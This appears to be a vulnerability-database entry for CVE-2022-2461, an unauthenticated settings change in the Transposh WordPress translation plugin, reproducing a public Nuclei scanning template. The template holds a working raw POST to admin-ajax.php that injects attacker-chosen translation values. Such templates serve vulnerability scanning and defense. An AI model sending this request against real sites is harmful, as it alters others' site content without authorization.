CVE-2022-2461: Transposh WordPress Translation <= 1.0.8 - Unauthenticated Settings Change

漏洞描述

The Transposh WordPress Translation plugin for WordPress is vulnerable to unauthorized setting changes by unauthenticated users in versions up to, and including, 1.0.8.1. This is due to insufficient permissions checking on the 'tp_translation' AJAX action and default settings which makes it possible for unauthenticated attackers to influence the data shown on the site.

PoC代码[已公开]

id: CVE-2022-2461

info:
  name: Transposh WordPress Translation <= 1.0.8 - Unauthenticated Settings Change
  author: riteshs4hu
  severity: medium
  description: |
    The Transposh WordPress Translation plugin for WordPress is vulnerable to unauthorized setting changes by unauthenticated users in versions up to, and including, 1.0.8.1. This is due to insufficient permissions checking on the 'tp_translation' AJAX action and default settings which makes it possible for unauthenticated attackers to influence the data shown on the site.
  reference:
    - https://wpscan.com/vulnerability/56a961b0-66b7-4dbf-a0e4-0cd38c9aa8dd/
    - https://github.com/MrTuxracer/advisories/blob/master/CVEs/CVE-2022-2461.txt
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/223373fc-9d78-47f0-b283-109f8e00b802?source=cve
    - https://www.wordfence.com/vulnerability-advisories/#CVE-2022-2461
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
    cvss-score: 5.3
    cve-id: CVE-2022-2461
    cwe-id: CWE-862
    epss-score: 0.25426
    epss-percentile: 0.96025
    cpe: cpe:2.3:a:transposh:transposh_wordpress_translation:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: transposh
    product: transposh_wordpress_translation
    framework: wordpress
    publicwww-query: "/wp-content/plugins/transposh-translation-filter-for-wordpress/"
    fofa-query: body="/wp-content/plugins/transposh-translation-filter-for-wordpress/"
  tags: cve,cve2022,wordpress,wp-plugin,wp,wpscan,transposh-translation-filter-for-wordpress,info-leak

variables:
  redirect_uri: "oast.me"

http:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=tp_translation&ln0=en&sr0={{redirect_uri}}&items=1&tk0={{redirect_uri}}&tr0={{redirect_uri}}

    matchers:
      - type: dsl
        dsl:
          - "contains(body, '200 - backup in sync')"
          - "contains(content_type, 'text/html')"
          - "status_code == 200"
        condition: and

    extractors:
      - type: regex
        part: header
        regex:
          - "Transposh: v-[0-9.]+"
# digest: 4a0a00473045022027fb224ff0faa9e5ea0af958f1b4a3b18a3292bdd34b08ae87a725af50c6cc32022100ab6f832d9232ea0ead8c055de8e33309bc691aadb18e11a7db835e6afb27408f:922c64590222798bb761d5b6d8e72950

来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2022/CVE-2022-2461.yaml